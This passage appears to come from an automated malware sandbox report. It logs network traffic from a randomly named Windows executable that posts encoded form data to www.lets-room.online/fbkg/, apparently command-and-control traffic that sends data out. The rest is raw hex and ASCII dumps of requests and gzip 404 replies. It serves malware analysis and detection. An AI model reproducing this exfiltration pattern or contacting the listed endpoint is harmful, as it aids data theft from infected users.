p3LOHKWBHsHgVSyHqlT1Iov9+m3DRFEoCFY04Zo1RVJMK9Ywlpx/IskhRqH9xStmbGIAC8zhlKIjD7JD7uQSPQFhGSie+OGSDPOGEFghYJ70eqOqIRYvX7jfi9izakRdQegPEkRwm00woHBTUdsnmv9h6CyrLeuIPpZYB4i3VEOzfLYzUtmnLBN7XjZraYdARY2gpA/rFyHjFpaTzyK3wFRhrVTaaeCRgaROQ5TgM1gMIqwu5JSyeETXUyARlsqMDuOYp8Zggdc38uO/8+ztFPJGF+a7sAj489LWGjujhH+FiYNZXdded+46gPvmXUFWs4fmo0dyoAUJ2zuEzKzKp2mAtRCqJbeHEFgLVv/unIzLrisOXGcHoTmUj3X2Pabrt78+u2sjz4tq0x5Q0WS36EFXqwH09PDoKigqXSUGWaKR3clOHgrIBpUnhid1Eyw/1RnI1TJUkIMm5B6DodqGETUgg1DWrFHwCVmRZAmUsk9YlWQfAMvjoFZoOv3kwkDgIN/eSLbUHEcpfp5pYU/Z9HfOEqSvjM9ucsMN3bX9ePy2I1Y7dgg98pfKrJ2FgUmsiBBggpIB+qx/VlclFDlmTO81X2OhLkCHN/vGrUtRRHANyPkURRbmeaHmxomPYBGZTe/zDUav1jz9bcv8a6jjB2lro/fGMVLVbS2pHF32RsL7mpoaehLPnKPHf2O5ZHhKX8oH9K88Mk11iwJQCeUQlCqNQv2kz/lZRgNomZtDRhJntzIs5+FTg2XylIBa33eGLI5DWx4MWpeqeNLQjRG5NBl4qKFb05ZQgkIKiqwegzJqJqjF+HmK6967NXBVOmmSeotDIJcuLhodvUm+MlvrkjBl+R7zR81NPDGWTXastCNPrB4c9yyb9hF3O5liPYZqohgznVot7JCWem0cM2n1BortjvSDCHuKbaJITs57B/A5e8VFS1XB8oB+tzyJRxzsJmJXZMXFwsFXJ6wKrWIfaOKbXUqz9NFnXabdAVq/TkQNi+xyjEi8Hhla6MsGxWEBKOaTDSJjdXeD0v9M+Cpw0O0xNJg236dI9qKEKPJCunqDOJLD6Y7yKBQxDv7ZhrdvYFW2rXD2W8G8qoL2/e1HCb8QX6Oq7yee+OxAC+hXPNVVbA6tiI5b1lfA0D7pGQB7JI/9uNlMIyJfJfQ8CG6xt+fpW488c56Fbh8zcn4Sp00PDUPlyott5WiXwXLT9ouEQuDaCz8rgeV6Az2J+0oJAqYsaoKe4KHVEIX/pkQysXF0MrDGXNuEiD6BtEIfsesf+rEFSIapoMEYp0p1aIZ0l+1C6tChbWhLwkH
                                                                                                                                                                                                Nov 17, 2023 19:29:24.206640005 CET609OUTData Raw: 36 37 72 64 4a 57 4d 32 44 6a 62 54 63 73 45 77 45 4a 39 4e 55 77 78 37 41 68 4c 2f 4f 30 33 6d 35 75 6e 37 54 50 51 76 48 57 45 4d 64 6d 53 38 38 46 69 78 66 34 69 36 4a 69 70 39 4a 4d 30 32 33 74 2b 51 37 65 4a 74 55 33 7a 78 38 6a 47 46 4f 35
                                                                                                                                                                                                Data Ascii: 67rdJWM2DjbTcsEwEJ9NUwx7AhL/O03m5un7TPQvHWEMdmS88Fixf4i6Jip9JM023t+Q7eJtU3zx8jGFO5CJvaIwaFwdfPahNu9S3gXRlqbn7rMg9gblrxb14xk6kqyesdiiQb5Xc1Qx2JRhMcGpKjnUFzbsWvzZDAqD+jjDAFBPrv8KE8U+sy915U3SydpZGHNFDR8R66n4YSzMHYVkuVms3JKHR0OC9tiafrTJ2U0VeWGMV4M
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207456112 CET611INData Raw: 3c c2 14 cf ce 3a af 56 4e 38 6a 6b 93 e7 92 b4 7d 30 de 00 b1 d2 53 18 f7 cf 88 80 f7 93 2f e1 22 8f 93 cf e3 ef 44 4e ae 77 93 cf 75 a8 a4 e2 ba 05 02 4d f1 cc 91 6b 94 a7 b8 05 7a d8 50 32 1a 05 4a 27 7d 93 d5 65 cc d3 ca ea 0d 07 76 24 bd 2f
                                                                                                                                                                                                Data Ascii: <:VN8jk}0S/"DNwuMkzP2J'}ev$/PB[$Pzi(wA#`a11wtZD7(.kL,YyZdB'-@VPZcV2cn)
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207732916 CET612INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:24 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 14 1a 81 ef 0f 4c df 73 1d 4f d5 2d 5d 57 c7 97 be 08 94 db 28 85 d1 d8 55 61 4f 29 4c 33 50 1d 47 36 4a d2 75 4b a2 17 a8 8d 5c 58 16 ce 90 a3 c8 37 ed 30 c4 14 93 fe 0e 96 91 b5 de 90 90 cb f7 4c fc 59 5d 2e 09 d2 1f d4 35 90 5d 65 5d 31 b8 61 b3 1e da 81 33 8c 9a d6 b1 fa d1 f5 f3 17 ce 5d 3a b7 7e cc 3a b2 e5 78 1d 7f cb 8c 02 69 f7 d7 b8 c1 45 5f 76 44 43 6c 8c 3c 3b 72 7c af 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 4a 66 e5 51 b4 c1 56 7e 66 b9 08 32 30 1c 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 f1 da f6 3b e3 0c d9 6d 63 08 5b 09 fd af 45 e6 6b a5 68 e5 32 c6 ed e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 e6 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 46 ed b7 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f9 4c b8 af 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d4 ad 36 bc be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e9 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 16 16 36 62 b3 f4 fc 30 02 89 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 01 6f f4 96 9b f5 e1 e2 be 1d a5 51 0c 57 7d 76 5b d5 db 41 33 de d5 e6 8a 9f 90 1d e3 27 6c db 07 fb ac 39 a5 f2 e1 a2 65 b7 47 51 e4 7b 61 a6 6f ac bb 00 02 5d 09 29 f5 07 18 c1 f5 83 16 5b 59 79 36 41 2d ad 08 9d f7 54 0b f6 1f 48 97 8d 91 ea 34 ef 9f eb 2f 6d cf 86 01 27 17 86 18 ca 4e 07 66 6a b9 84 9c 59 e4 11 41 6b f4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 81 62 1e 7f 2f c9 c1 70 05 7d 5a a1 3f 0a 6c d5 c8 44 20 66 2e 35 7f 43 a3 10 12 45 71 bd e4 38 45 f9 99 ba 0b fe 78 f0 7a 3a fe 40 3a 39 c1 67 4e 53 10 5d 37 b0 3c b5 65 ad 8e a2 41 26 d9 5c e9 a9 9e 62 cc 68 90 49 be 44 45 36 56 25 9d ae d7 08 a1 28 af d3 c2 58 07 2f 34 fe 07 80 f1 df 78 47 24 1f c5 7b c9 27 c9 4d 11 df cf 78 e1 68 c1 15 c3 a1 f4 e6 60 76 18 f8 03 df e0 b8 54 54 4c a1 58 b3 53 08 99 80 1d 8b 86 c9 bc 5b fb 38 73 a7 0a 80 ab 00 ee e7 aa e2 24 3f 92 c3 f7 4e 4e 26 65 cf c5 52 f8 7f 8b 71 cb 88 9b 2e 6a 3b dd 57 dc ee fe 32 f8 6e 3f f2 87 45 55 a4 54 10 7f 4d dc 46 04 4b ba be 99 7c 10 3f d4 5f c5 94 1f f6 4e 2e 72 44 56 e9 42 76 4a 15 1e a9 41 71 ee 49 a9 b6 42 46 75 fe a6 0a 28 33 39 70 2e 43 c7 1b 34 fa 9e b6 4f 67 9d 98 bf 40 b0 ae 31 80 3f 3b 5e cb 55 1b 91 a1 7d 1b 13 46 81 ef 75 9f 6e 14 b0 31 e0 6e 53 30 fb 17 d0 8b c8 05 f5 3e 8e ef 01 67
                                                                                                                                                                                                Data Ascii: e33Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktULsO-]W(UaO)L3PG6JuK\X70LY].5]e]1a3]:~:xiE_vDCl<;r|Rz}u1n,T@z#\-?8dXF0@JfQV~f20i$<l$;mc[Ekh2SmN4pV+!J);G$R`x/~Em|'y|^%WFmPaEeLv]PE6aF%uhgUVV C*x/6b0a$#ffOvZhc"SCioQW}v[A3'l9eGQ{ao])[Yy6A-TH4/m'NfjYAkY[=U~cb/p}Z?lD f.5CEq8Exz:@:9gNS]7<eA&\bhIDE6V%(X/4xG${'Mxh`vTTLXS[8s$?NN&eRq.j;W2n?EUTMFK|?_N.rDVBvJAqIBFu(39p.C4Og@1?;^U}Fun1nS0>g
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207767010 CET615OUTData Raw: 6b 6c 77 65 63 66 6c 73 2b 78 4d 6f 42 36 66 76 35 79 77 77 7a 61 41 42 7a 51 54 64 74 47 4d 67 6b 44 70 79 4d 33 6a 4a 68 56 73 71 6e 49 4d 64 73 71 47 5a 2f 4d 6d 4f 66 48 36 51 39 34 62 42 49 67 70 46 4d 32 6f 6f 4e 36 46 48 64 44 33 74 6f 73
                                                                                                                                                                                                Data Ascii: klwecfls+xMoB6fv5ywwzaABzQTdtGMgkDpyM3jJhVsqnIMdsqGZ/MmOfH6Q94bBIgpFM2ooN6FHdD3tosmc5AlYec6LIJRVpv3JDEQdoRzEtNPGLTR15J7INenjQxA9k5el+e6F10+0tgl5wezq0lclJG/07v/MuTwSFf1lYkC+PoQ4KUPv1WiLm220D1JiDot60bxGQcVFxGqdoFSGpD3+Mp/L5nzkso2gThhczZbAJ3Z0qG1
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207828045 CET616INData Raw: 20 c8 79 f9 0e 3e 32 95 df a7 fc 04 3d d9 bb c8 b7 38 05 81 b7 14 0e 96 1e 40 16 1c 2c 80 a6 39 57 cb 63 06 65 26 60 ee 4f 20 6c 3a 23 dd d7 ec 89 b5 d7 de 34 38 a9 c9 33 4d 74 c6 10 e9 de 9c 8f a3 d2 a3 a9 f4 88 15 4c c4 f7 64 4f bd ec 4b 0f 9a
                                                                                                                                                                                                Data Ascii: y>2=8@,9Wce&`O l:#483MtLdOKWp62^="?*7^WDF>P8V:_?2u24ZNg82t.T0^S.nEeYTg#)6X^7ySo'_G&]4tuJy
                                                                                                                                                                                                Nov 17, 2023 19:29:24.208199978 CET619OUTData Raw: 66 65 74 53 45 4c 45 63 51 5a 6a 49 53 42 4c 35 67 76 33 4f 45 48 76 63 68 37 54 66 49 67 52 4f 6a 65 56 32 78 6d 55 52 54 50 44 67 55 72 6a 68 38 56 4e 4b 45 4f 63 67 30 38 37 65 50 4b 61 62 48 69 75 65 48 46 6c 63 6f 49 32 63 45 6c 4d 72 72 4c
                                                                                                                                                                                                Data Ascii: fetSELEcQZjISBL5gv3OEHvch7TfIgROjeV2xmURTPDgUrjh8VNKEOcg087ePKabHiueHFlcoI2cElMrrLfGYmaIRIwEwXzk2TWA7WIm0H7qEfWluchUQOCQOIexzajo69Au54YIWQCp7soRUPbANH1AbcVUMQFarXoJmFXBJCStNguZ+wcP+KeY+INJ7B9zIH0tl4NaVqEabbFjiU33bXFNlGS2zh9WyE0qcd+B4lwK9XmQISg
                                                                                                                                                                                                Nov 17, 2023 19:29:24.428890944 CET621OUTData Raw: 64 35 42 67 6e 6f 30 38 76 44 7a 51 32 43 4f 52 65 74 75 34 5a 4f 4c 79 63 57 6d 62 46 2f 47 6b 70 4a 38 57 4a 79 75 75 78 65 4c 64 43 45 7a 76 65 6e 73 42 39 58 71 39 66 55 69 47 2b 32 42 79 37 68 48 48 61 4c 4d 30 75 69 31 6c 68 67 45 75 71 34
                                                                                                                                                                                                Data Ascii: d5Bgno08vDzQ2CORetu4ZOLycWmbF/GkpJ8WJyuuxeLdCEzvensB9Xq9fUiG+2By7hHHaLM0ui1lhgEuq4RvBxYtDQ8gVrXzGYffSOqGVw/Pl0Mgp63yIvogFxE4ji79BA5F/4HdskcysC2x9mLbRry2ZB/bRmlV5e0DyuTzI5wcRSVonHU5eG8Hi160LOtYoYgHW1YZgVzvOT6HdGQ40n3+TA8F/BLRM22tHy8mcE1RXlCnky4
                                                                                                                                                                                                Nov 17, 2023 19:29:24.428999901 CET625OUTData Raw: 2f 69 5a 6d 52 66 4d 70 51 55 43 6b 5a 30 63 55 4c 54 56 4d 6b 73 50 69 65 70 32 68 2b 45 79 41 43 67 32 77 73 43 42 6c 2f 4e 4c 66 74 68 59 48 54 50 75 6c 57 66 53 6a 37 65 6b 32 69 38 7a 55 47 36 4e 38 73 73 62 57 68 4b 4f 53 2f 35 50 76 47 49
                                                                                                                                                                                                Data Ascii: /iZmRfMpQUCkZ0cULTVMksPiep2h+EyACg2wsCBl/NLfthYHTPulWfSj7ek2i8zUG6N8ssbWhKOS/5PvGI5AoxzevE+Cojyy2GXCxendFVP6dZFXOI17hGA/p4yn2GYvVQHP52wX7rTNpRb6azYwsuyVKfcqG+9KJFfjvC8qW4L8UMuZRjk2IpWg1AkQFyxAYPqn9gzsSUV8ISFCSpzWvVYWwQEGuchPI4QlXEAuA2AxZPwfpoY
                                                                                                                                                                                                Nov 17, 2023 19:29:24.643881083 CET628OUTData Raw: 75 54 38 4c 7a 6e 52 37 45 56 41 6b 4d 57 2f 63 49 5a 73 68 65 55 50 70 7a 47 78 46 33 44 33 72 4a 49 31 65 67 69 74 42 78 44 63 4c 6a 61 62 38 76 79 50 4c 79 44 31 74 62 6c 49 30 72 71 54 30 66 44 47 72 77 42 4e 79 33 42 35 4e 4e 64 33 56 75 51
                                                                                                                                                                                                Data Ascii: uT8LznR7EVAkMW/cIZsheUPpzGxF3D3rJI1egitBxDcLjab8vyPLyD1tblI0rqT0fDGrwBNy3B5NNd3VuQtzpRK7XAvoOaGg2C5gddzNC0yqfeib3HRpkCYmWKYXASCB2Outm3BIu3z/cI+1zO4xa07rGQ1Ok6tmY1BGwL/b8bvXCqvhS61gQ6gEX+qBPhhY0LnnutTRNKmNGPt+72smN2a2a2moFyfJStGodpXly7GDESl5aMJ
                                                                                                                                                                                                Nov 17, 2023 19:29:24.644068003 CET630OUTData Raw: 70 54 5a 33 38 42 79 51 77 36 45 76 6f 4a 6c 74 66 79 66 6c 69 51 34 37 4d 4c 57 67 6e 44 64 4a 74 46 43 70 4b 75 70 2f 52 6b 5a 46 6c 53 5a 31 5a 4d 5a 39 45 41 66 55 4f 6a 77 39 6f 77 65 68 54 66 6c 37 64 72 35 59 5a 57 4b 62 76 31 36 34 44 4f
                                                                                                                                                                                                Data Ascii: pTZ38ByQw6EvoJltfyfliQ47MLWgnDdJtFCpKup/RkZFlSZ1ZMZ9EAfUOjw9owehTfl7dr5YZWKbv164DOqEj51kVqW+/p2ERYVwcilS1rK62Xmd55axnQ8R39U4DAwrq02AW+irPju4x8iSiQLtM/ptER+WiHRjWFk4UlryH7mNzl9H/Juu0VgCh4GIou1g7jtgKQDfRUxNlimb/Cs219lg06IbOFCBkknpn+jkwklFKo8KXDE
                                                                                                                                                                                                Nov 17, 2023 19:29:24.644179106 CET632OUTData Raw: 66 50 37 6f 4f 2f 46 6d 2b 35 52 53 62 46 64 64 31 4b 33 42 59 71 74 55 45 4c 38 74 6b 4b 46 53 58 70 48 59 76 72 4d 66 2b 47 47 4a 41 67 45 65 68 54 6e 32 6f 46 51 6e 47 32 37 76 52 56 30 61 4b 47 35 57 6d 69 73 4a 6f 2b 68 65 6a 75 58 51 65 65
                                                                                                                                                                                                Data Ascii: fP7oO/Fm+5RSbFdd1K3BYqtUEL8tkKFSXpHYvrMf+GGJAgEehTn2oFQnG27vRV0aKG5WmisJo+hejuXQeeVZeqUyqntJmuuEWhwFkpHCv7H6AVciKJX4YZyzbL+sU97+zFNpRDgpoV9NISGXzpxsmDJODsWfiMSAuLAV+RKy4GxNpvaK9RccbYHTFp97RWedtB8OZhdV78x0STCXtg7oslR94YSHsEtoAeXDO9nbIujdrevZO6U
                                                                                                                                                                                                Nov 17, 2023 19:29:24.860112906 CET634OUTData Raw: 7a 4c 79 46 45 6c 6a 67 6e 44 4f 73 4d 67 47 7a 6f 62 68 58 63 62 54 6a 6d 52 59 4e 50 4e 72 43 50 73 36 4c 33 61 51 6e 56 43 72 75 64 56 6f 43 65 6b 75 70 78 74 71 56 43 47 6f 4d 7a 6d 33 76 79 5a 64 44 4b 42 61 69 66 42 50 78 33 53 6c 59 62 45
                                                                                                                                                                                                Data Ascii: zLyFEljgnDOsMgGzobhXcbTjmRYNPNrCPs6L3aQnVCrudVoCekupxtqVCGoMzm3vyZdDKBaifBPx3SlYbEFdtxmezsAT2gsUjgMKVhDTtt3Cxkm3DNL8/EV6+GjbXI3u19mYCSH0vTIYaPp4lP/LInKvSZSd8RuFZ+j7G5EdzdOQT0WRBD6sHKSUQ79nFEyjHC3p+9xmBDJuDYmiY1sZ6kTovU7ZSVIV9TsUzIH+bqWdCOaOO9F
                                                                                                                                                                                                Nov 17, 2023 19:29:24.860188007 CET637OUTData Raw: 38 32 31 2f 65 48 51 74 54 70 33 4b 61 45 30 7a 70 36 32 46 31 55 69 6d 78 54 4a 4f 61 4e 30 52 53 75 41 50 34 52 58 6e 51 4a 34 56 38 33 38 63 49 68 52 6f 71 68 61 67 72 43 71 61 68 4a 38 45 37 76 37 62 6a 6e 37 7a 39 6c 42 47 4c 66 45 77 35 43
                                                                                                                                                                                                Data Ascii: 821/eHQtTp3KaE0zp62F1UimxTJOaN0RSuAP4RXnQJ4V838cIhRoqhagrCqahJ8E7v7bjn7z9lBGLfEw5CVHtWoS6Zxv5Zz/hn2v5/7oSjsDt4CAkq/ClFBPwKciH11cjGdWpAFP7OvmVHzHigdngEHGDmxB7I+XNUVuSYyIxOXaZc9SPcdVD9ts3aGAEcVvQrmsrEMMdzKDeKjN6Oq7XEnLVV1mcaWSDbQdrY4My8z8+eARHXy


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                25192.168.11.2050152194.58.112.17480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:23.991671085 CET608OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.lets-room.online
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.lets-room.online
                                                                                                                                                                                                Referer: http://www.lets-room.online/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 34 63 65 41 45 71 4c 31 76 72 73 6b 74 4e 32 53 67 64 4a 53 65 75 46 72 56 36 6e 66 6b 4d 39 62 67 73 61 56 64 55 34 52 47 74 56 50 46 39 64 33 6f 39 34 77 59 71 67 4d 45 63 70 30 43 57 69 37 63 72 6a 72 6e 59 59 66 58 53 42 30 46 38 6d 52 72 58 33 35 68 41 73 33 39 58 36 69 52 52 6d 58 34 2b 70 6f 2b 38 74 62 47 35 6b 42 70 36 4f 78 6c 6e 73 34 42 47 6f 4f 61 75 58 62 49 44 59 6b 65 44 57 6d 77 6d 4b 4a 63 4e 70 4d 33 73 73 64 58 64 52 7a 66 37 4d 2b 58 72 44 59 4a 78 2b 76 38 4b 35 6f 7a 47 35 44 6d 6b 32 68 45 50 2f 53 48 78 6e 6a 71 7a 4c 6e 44 6b 36 70 6c 6c 63 67 34 46 77 48 33 75 41 36 41 7a 61 6c 6b 43 66 61 6d 71 7a 46 68 31 64 39 61 2f 42 42 50 7a 37 2f 56 65 78 37 37 61 6e 74 67 6c 42 2f 51 71 44 61 69 69 61 72 43 57 4e 46 34 39 5a 33 49 71 53 39 62 79 38 35 66 58 71 61 34 39 78 4e 4c 30 4a 36 67 5a 36 47 4e 59 4a 36 6d 50 56 42 4b 62 5a 70 63 4d 74 6b 77 49 42 67 4f 48 2b 7a 2b 6a 49 35 4a 57 6a 4d 6c 66 46 4e 31 78 4b 44 73 6c 2b 37 52 37 58 41 6e 6e 63 59 46 61 44 59 6e 4f 5a 41 72 49 41 74 4d 4e 77 49 37 6e 6d 33 6f 33 32 69 72 76 6c 5a 4d 77 78 65 4a 49 6d 46 61 53 72 54 77 2b 5a 51 70 59 4a 64 39 51 68 6b 55 2f 39 41 4d 41 46 66 6e 6e 71 70 48 6e 7a 73 45 7a 59 30 45 75 76 50 35 58 52 62 79 6b 48 50 48 35 73 39 2b 50 56 37 47 2f 34 6c 46 4d 45 66 76 36 75 39 4c 6d 7a 6b 6e 59 6d 32 52 38 2b 58 66 6e 78 4f 68 50 66 33 52 53 4a 4e 67 6c 59 79 4a 2f 76 61 48 4a 58 76 37 2b 33 59 2b 56 75 71 33 34 57 30 4f 74 52 45 70 4a 76 4e 62 4e 51 50 38 4f 5a 41 46 64 2b 63 69 48 66 6b 63 2f 4c 64 73 61 36 52 67 77 45 41 7a 4a 70 31 51 66 67 4b 41 4b 73 56 51 53 50 30 47 6c 46 65 6a 5a 63 66 50 42 35 79 79 34 54 69 58 4b 58 59 2b 47 50 34 6d 74 31 76 68 6c 4a 4a 33 35 47 4b 73 7a 77 33 75 43 72 5a 59 37 6c 41 32 75 61 63 57 6e 70 55 49 6e 55 66 53 6d 50 66 6a 42 64 68 6d 71 36 31 72 67 37 6a 6a 33 58 64 31 56 65 4d 65 69 76 37 6b 54 47 35 70 35 32 53 48 35 61 4b 66 42 33 56 7a 64 41 5a 4e 36 53 32 31 4b 43 6f 72 50 57 48 50 33 34 39 6a 54 4f 48 66 6c 66 79 2b 78 4a 56 63 76 78 79 37 71 32 50 46 2b 46 66 4d 36 6e 48 46 61 66 7a 42 74 33 48 63 4b 45 4d 2f 50 4f 47 67 69 5a 39 67 47 4a 71 64 4a 77 2b 4f 31 63 78 5a 67 4d 4b 70 6a 6c 64 30 73 6d 43 39 42 55 4e 72 4e 68 30 66 48 75 6f 53 76 4b 4e 33 31 71 4a 56 37 36 63 35 78 72 32 52 6d 63 46 4b 64 70 31 56 6b 78 76 68 6e 49 36 50 47 4e 6e 45 2f 47 35 4a 62 30 31 4c 76 34 52 55 35 38 47 56 71 76 50 4b 32 76 58 67 4d 43 42 6a 54 41 58 4a 4e 77 37 77 6a 76 57 47 5a 38 30 4b 4a 58 44 79 67 2f 43 35 37 6d 64 34 47 6a 67 36 6c 67 31 4d 51 53 69 51 64 75 52 6e 32 6a 6d 58 6d 6e 34 61 32 61 5a 70 7a 66 58 73 65 6b 7a 53 63 59 43 43 39 74 4c 74 44 57 74 76 64 4a 56 4e 4a 67 59 35 6e 61 51 32 55 66 44 70 37 38 30 4e 38 6b 35 62 6e 30 5a 67 65 38 4d 4e 2b 72 45 35 32 46 38 2f 4b 4b 69 64 69 35 68 33 61 64 68 62 51 48 56 69 59 61 56 4c 33 76 7a 36 51 6c 38 79 6a 56 66 41 4c 62 57 6c 71 76 55 5a 6f 7a 67 47 64 6e 71 47 72 48 45 65 52 47 37 41 54 46 62 70 66 56 4f 31 6f 33 65 2b 72 41 47 77 45 69 54 6d 2f 64 30 33 78 46 7a 4b 54 53 72 53 2b 49 68 43 36 6f 53 4a 32 48 53 52 35 77 64 53 4b 30 33 31 65 42 71 4d 50 64 4e 47 7a 4f 71 51 72 47 72 76 70 46 32 77 46 6f 7a 39 42 52 48 31 45 6c 64 5a 4c 4e 39 68 6e 44 57 43 48 36 4e 6f 4e 71 50 71 35 2b 65 75 6c 78 7a 6b 4d 58 49 36 37 65 36 57 32 75 66 65 52 65 77 48 73 30 67 53 72 79 56 35 6d 33 61 70 42 74 72 6a 31 69 51 43 4d 59 53 44 2f 2f 6c 4c 50 6b 44 4c 66 55 51 4b 37 30 61 67 6a 64 4f 33 32 4c 75 70 56 66 4a 37 55 63 65 61 68 72 43 76 47 39 51 46 49 53 50 78 48 52 57 4c 6d 51 42 6a 6c 4f 78 67 32 6a 44 61 68 69 79 52 4f 78 63 2f 67 37 7a 58 36 69 6f 2b 50 39 39 55 59 58 47 75 57 41 75 33 35 2f 33 75 37 5a 73 74 6a 73 4c 66 76 51 63 4f 63 6d 4d 69 54 46 2b 76 70 4d 37 46 77 32 38 7a 35 54 63 4b 71 44 77 5a 70 48 77 67 58 35 50 4d 31 50 78 51 45 52 59 32 42 6b 59 45 59 2b 70 66 61 31 6a 50 42 6e 4b 6c 53 64 57 48 4c 41 63 52 77 6b 35 43 57 39 4a 78 54 2f 4c 48 49 56 73 4e 50 74 73 66 6a 74 2f 79 6a 6d 77 59 47 4c 32 38 68 44 31 64 4a 41 48 34 68 79 44 36 69 63 37 4b 31 5a 67 57 4a 71 42 74 44 6e 6c 52 79 6c 39 76 30 42
                                                                                                                                                                                                Data Ascii: T6I=4ceAEqL1vrsktN2SgdJSeuFrV6nfkM9bgsaVdU4RGtVPF9d3o94wYqgMEcp0CWi7crjrnYYfXSB0F8mRrX35hAs39X6iRRmX4+po+8tbG5kBp6Oxlns4BGoOauXbIDYkeDWmwmKJcNpM3ssdXdRzf7M+XrDYJx+v8K5ozG5Dmk2hEP/SHxnjqzLnDk6pllcg4FwH3uA6AzalkCfamqzFh1d9a/BBPz7/Vex77antglB/QqDaiiarCWNF49Z3IqS9by85fXqa49xNL0J6gZ6GNYJ6mPVBKbZpcMtkwIBgOH+z+jI5JWjMlfFN1xKDsl+7R7XAnncYFaDYnOZArIAtMNwI7nm3o32irvlZMwxeJImFaSrTw+ZQpYJd9QhkU/9AMAFfnnqpHnzsEzY0EuvP5XRbykHPH5s9+PV7G/4lFMEfv6u9LmzknYm2R8+XfnxOhPf3RSJNglYyJ/vaHJXv7+3Y+Vuq34W0OtREpJvNbNQP8OZAFd+ciHfkc/Ldsa6RgwEAzJp1QfgKAKsVQSP0GlFejZcfPB5yy4TiXKXY+GP4mt1vhlJJ35GKszw3uCrZY7lA2uacWnpUInUfSmPfjBdhmq61rg7jj3Xd1VeMeiv7kTG5p52SH5aKfB3VzdAZN6S21KCorPWHP349jTOHflfy+xJVcvxy7q2PF+FfM6nHFafzBt3HcKEM/POGgiZ9gGJqdJw+O1cxZgMKpjld0smC9BUNrNh0fHuoSvKN31qJV76c5xr2RmcFKdp1VkxvhnI6PGNnE/G5Jb01Lv4RU58GVqvPK2vXgMCBjTAXJNw7wjvWGZ80KJXDyg/C57md4Gjg6lg1MQSiQduRn2jmXmn4a2aZpzfXsekzScYCC9tLtDWtvdJVNJgY5naQ2UfDp780N8k5bn0Zge8MN+rE52F8/KKidi5h3adhbQHViYaVL3vz6Ql8yjVfALbWlqvUZozgGdnqGrHEeRG7ATFbpfVO1o3e+rAGwEiTm/d03xFzKTSrS+IhC6oSJ2HSR5wdSK031eBqMPdNGzOqQrGrvpF2wFoz9BRH1EldZLN9hnDWCH6NoNqPq5+eulxzkMXI67e6W2ufeRewHs0gSryV5m3apBtrj1iQCMYSD//lLPkDLfUQK70agjdO32LupVfJ7UceahrCvG9QFISPxHRWLmQBjlOxg2jDahiyROxc/g7zX6io+P99UYXGuWAu35/3u7ZstjsLfvQcOcmMiTF+vpM7Fw28z5TcKqDwZpHwgX5PM1PxQERY2BkYEY+